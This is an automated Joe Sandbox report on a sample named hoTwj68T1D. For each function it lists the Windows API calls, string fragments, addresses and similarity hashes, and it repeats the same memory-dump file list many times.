Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ActiveWindow$LoadMessageString
String ID: :00000001FF$AFM$CIL$DRU$EnterCriticalSection$FNT$LIN$N/$P$gBUSE0$tion
API String ID: 620591045-3292140881
Opcode ID: 38e76590d0106715aa1a8c5921e6d8cc4b81944754087892f1a2a27ed5f55e01
Instruction ID: 1a815100857a995bf54291b98f36de669543efa46b32ea4aa923df14f26fee6f
Opcode Fuzzy Hash: 38e76590d0106715aa1a8c5921e6d8cc4b81944754087892f1a2a27ed5f55e01
Instruction Fuzzy Hash: BC038234A04199CFDB51EB69C888BA9BBF1EB05304F1845F6D4489B3A3C734AE85DF58

Function 00418C98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00418CA7
GetWindowPlacement.USER32(?,0000002C), ref: 00418CC4
GetWindowRect.USER32(?), ref: 00418CE0
GetWindowLongA.USER32(?,000000F0), ref: 00418CEE
GetWindowLongA.USER32(?,000000F8), ref: 00418D03
ScreenToClient.USER32(00000000), ref: 00418D0C
ScreenToClient.USER32(00000000,?), ref: 00418D17

Strings

,, xrefs: 00418CB0

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: c181d80f40c72c560e7e0e6c6a52f8b498709489c34f1fdc8bd10179bb5a24ec
Instruction ID: 7548ba6b47f43be6b81819a0b5bf390756b3afecf8cf7412b78fc703f8666d52
Opcode Fuzzy Hash: c181d80f40c72c560e7e0e6c6a52f8b498709489c34f1fdc8bd10179bb5a24ec
Instruction Fuzzy Hash: C2110771505200ABDB00EF6DC885E9B77E8EB48324F140A6AB958DB296D738D940CBA5

Function 00491EDC Relevance: 13.8, Strings: 10, Instructions: 1325COMMON

Download Yara Rule

Strings

U, xrefs: 00492232
gBUSE0 - , xrefs: 00493509
x/, xrefs: 0049207D, 0049357A
XXXX, xrefs: 00493395
tion, xrefs: 0049220F, 00493530, 0049364A
gBUSE0, xrefs: 00493645
N/, xrefs: 00491F18, 00491F26, 00491F34, 00491F3F, 00491F4D, 00492018, 00492F8D, 00492F99, 0049341B, 004935C4, 00493689
XXX, xrefs: 0049336A
gBUSE0, xrefs: 00491FF0, 004920AA
ticalSection, xrefs: 00491F06, 0049202F, 00492049, 00492063, 00492160, 004921B8, 004921F5, 0049223B, 00492249, 00492270, 0049227C, 0049228D, 0049229E, 004922AF, 004922C0, 004922D1, 004922E2, 004922F3, 00492304, 00492315, 00492332, 00492340, 00492358, 00492366, 0049237E, 0049238C, 004923A4, 004923B2, 004923CA, 004923D8, 004923F0, 004923FE, 00492416, 00492424, 0049243C, 0049244A, 00492462, 00492470, 00492488, 00492496, 004924AE, 004924BC, 004924D4, 004924E2, 004924FA, 00492508, 00492520, 0049252E, 00492546, 00492554, 00492560, 00492579, 00492585, 00492596, 004925A7, 004925C0, 004925CC, 004925DD, 004925EE, 004925FF, 00492621, 0049263F, 00492656, 00492667, 00492678, 00492689, 004926A2, 004926AE, 004926BF, 004926D0, 004926E1, 004926F9, 0049271F, 0049272D, 0049273B, 0049275C, 0049276A, 00492789, 00492795, 004927A7, 004927B3, 004927C1, 004927DA, 004927E6, 004927F8, 00492804, 00492812, 0049282E, 0049283C, 0049284C, 0049285A, 0049286D, 0049287C, 0049288B, 0049289F, 004928AE, 004928BD, 004928CC, 004928DB, 004928ED, 004928FC, 0049295E, 0049296A, 00492978, 00492986, 004929CA, 004929D6, 004929E2, 004929EE, 004929FA, 00492A0B, 00492A24, 00492A32, 00492A40, 00492A4E, 00492A5C, 00492A88, 00492A9F, 00492AAB, 00492AB7, 00492AC3, 00492AE3, 00492AEF, 00492AFD, 00492B0B, 00492B2A, 00492B38, 00492B46, 00492B54, 00492B62, 00492B99, 00492BB0, 00492BBC, 00492BC8, 00492BD3, 00492BF5, 00492C00, 00492C2E, 00492C47, 00492C55, 00492C63, 00492C71, 00492C7F, 00492C9E, 00492CAC, 00492CCB, 00492CE2, 00492CF9, 00492D05, 00492D10, 00492D1E, 00492D2C, 00492D38, 00492D44, 00492D64, 00492F59, 00492F68, 00492F74, 00492F7F, 00492FA3, 00492FAE, 00492FD2, 00492FDE, 00492FEC, 00493020, 00493047, 00493079, 004930F8, 0049316E, 00493195, 004931C7, 00493246, 004932AF, 004932D6, 00493308, 004933EC, 0049344F, 0049345D, 0049346B, 004934BC, 004934F2, 00493584, 004935A9, 004935CE, 004935F3, 0049360C, 004936D7, 004936E6, 004936F5

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: N/$U$XXX$XXXX$gBUSE0$gBUSE0$gBUSE0 - $ticalSection$tion$x/
API String ID: 0-3440009733
Opcode ID: 4a4518c3beee5eca6f2c52e2851c8da5ea6ec733e69459f5cac6d1725c9eaad4
Instruction ID: be5901e0df554a122fe68387d1ea4dae6802f700bd3e3503ca8c8f1cc3e110ed
Opcode Fuzzy Hash: 4a4518c3beee5eca6f2c52e2851c8da5ea6ec733e69459f5cac6d1725c9eaad4
Instruction Fuzzy Hash: ECD28F786052848FDB51DF28D8C9B957FE1AB46314F0850F6D8488F3B6C7B4AC85CB99

Function 00418538 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00418577
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 00418595
GetWindowPlacement.USER32(?,0000002C), ref: 004185CB
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004185F2

Strings

,, xrefs: 004185B9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: c620aafd330b5fbe8c99cbbfc4547d210bcbb1762cdeabb9c8fe8f1f6c8e1d31
Instruction ID: 0415916c61e3f6e048113235f03059348d72ba89af52dd7a8e2f29a006aef695
Opcode Fuzzy Hash: c620aafd330b5fbe8c99cbbfc4547d210bcbb1762cdeabb9c8fe8f1f6c8e1d31
Instruction Fuzzy Hash: EA212C71A00204ABCF10EF69C8C0BDA77A9EB48354F15456AFD18DF246DA78ED44CBA8

Function 00498170 Relevance: 7.6, Strings: 6, Instructions: 144COMMON

Download Yara Rule

Strings

gBUSE0, xrefs: 004981AA, 0049825E
gBUSE0, xrefs: 00498373
x/, xrefs: 00498237, 004982A5
tion, xrefs: 00498378
N/, xrefs: 004981D2, 00498287
ticalSection, xrefs: 004981E9, 00498203, 0049821D, 004982B8

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ActiveWindow$LoadMessageString
String ID: N/$gBUSE0$gBUSE0$ticalSection$tion$x/
API String ID: 620591045-1092766344
Opcode ID: 7b70422beb55e7588bd0d52f6706eda6d895e8c5d2fa7f0f0c288530ba623d37
Instruction ID: 43656195344dfb16851a5f59caa9e1bc67f04ff22c83c8d3dea9395367ee8026
Opcode Fuzzy Hash: 7b70422beb55e7588bd0d52f6706eda6d895e8c5d2fa7f0f0c288530ba623d37
Instruction Fuzzy Hash: 945173307005449FEB54EF2EDD85B9A7BD1AF86304F5880BABC04CB266DE789D418758

Function 0043279C Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,004328CF,?,?,?,?,?,0043291C), ref: 004327FE
SetKeyboardState.USER32(?), ref: 0043282A
SendMessageA.USER32(00000000,00000100,00000025,00000001), ref: 00432840
SendMessageA.USER32(00000000,00000101,00000025,00000001), ref: 00432856
SetKeyboardState.USER32(?,00000000,00000101,00000025,00000001,00000000,00000100,00000025,00000001,?), ref: 00432862

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: KeyboardState$MessageSend
String ID:
API String ID: 2471416488-0
Opcode ID: 47cfd3d05e399a037ae5fd3f6d29e1bd33c0c4adb3fd862aea08b39eb9d9e9bf
Instruction ID: e6d2380235909ec2f5c2df356027efe608437b5101d06d6a905c5377bf8ea906
Opcode Fuzzy Hash: 47cfd3d05e399a037ae5fd3f6d29e1bd33c0c4adb3fd862aea08b39eb9d9e9bf
Instruction Fuzzy Hash: 2931F870B007155BDB11FA6A8D8579EB299AB4C708F4005BFB504E7282DBFC8E418A5C

Function 0045B504 Relevance: 7.2, Strings: 5, Instructions: 908COMMON

Download Yara Rule

Strings

#, xrefs: 0045B7BB
R, xrefs: 0045BBF6
y0#251, xrefs: 0045B613
, xrefs: 0045B7E2
ticalSection, xrefs: 0045B5FF, 0045B802, 0045B810, 0045B824, 0045C0C9, 0045C105, 0045C112, 0045C143, 0045C17F, 0045C18C

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: $#$R$ticalSection$y0#251
API String ID: 0-3181228214
Opcode ID: 5e01292db25eda0676c5bd3e7d30390d483fe0669266c22f08eb5969e4e0d8f6
Instruction ID: e84ce5b20b7b85b0fe1f81fcf23778b9d834294228461e0592ed1cf7e9e742b1
Opcode Fuzzy Hash: 5e01292db25eda0676c5bd3e7d30390d483fe0669266c22f08eb5969e4e0d8f6
Instruction Fuzzy Hash: 61926234A0424A9FDB01DF69C484BEDBBF1FF49305F1440A6E8546B363C778A949CB99

Function 0044D328 Relevance: 7.1, Strings: 5, Instructions: 821COMMON

Download Yara Rule

Strings

, xrefs: 0044D5FE
R, xrefs: 0044D9DF
#, xrefs: 0044D5D7
y0#251, xrefs: 0044D42F
ticalSection, xrefs: 0044D41B, 0044D61E, 0044D62C, 0044D640, 0044DE3A, 0044DE76, 0044DE83

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: $#$R$ticalSection$y0#251
API String ID: 0-3181228214
Opcode ID: 376eb03f614252bb83eb010582137fbd4e5dbb0431406bfadc76ef3463a23e0c
Instruction ID: dca92ec80ddcb5e7a65e30285528d97bfb6d5fd0478b647cda8229ab37a83387
Opcode Fuzzy Hash: 376eb03f614252bb83eb010582137fbd4e5dbb0431406bfadc76ef3463a23e0c
Instruction Fuzzy Hash: 7572A434A05189DFEB01DBA8C488BEDBBF1BF49308F1840A6E454AB353C778A955CB59

Function 004063C8 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004063E3
FindClose.KERNEL32(00000000,00000000,?), ref: 004063EE
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00406407
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00406418

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 4b9fcd4a28bb076287ae0f41079680f824f3cbf8f8705a9bfdee3eca703259a8
Instruction ID: 3755e708331a976cc05184066ad33b6d8107bdd4f4e0002ecdc41a8e31f95925
Opcode Fuzzy Hash: 4b9fcd4a28bb076287ae0f41079680f824f3cbf8f8705a9bfdee3eca703259a8
Instruction Fuzzy Hash: 2FF012B2D0020DB6CB10EAE58C859CFB7AC9B49324F5046B7B619F31D1EA389B544B58

Function 0041F030 Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32(0000000E), ref: 0041F03D
CopyEnhMetaFileA.GDI32(00000000,00000000), ref: 0041F05F
GetEnhMetaFileHeader.GDI32(?,00000058,?,00000000,00000000), ref: 0041F071

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: FileMeta$ClipboardCopyDataHeader
String ID:
API String ID: 1752724394-0
Opcode ID: 221b4bd327ef1463202b965628094a04722779236e138742577cc21445975657
Instruction ID: be5fdd9a411e6ed2f442f3513d0cea67022140215701be801b58144c1b6a1d5e
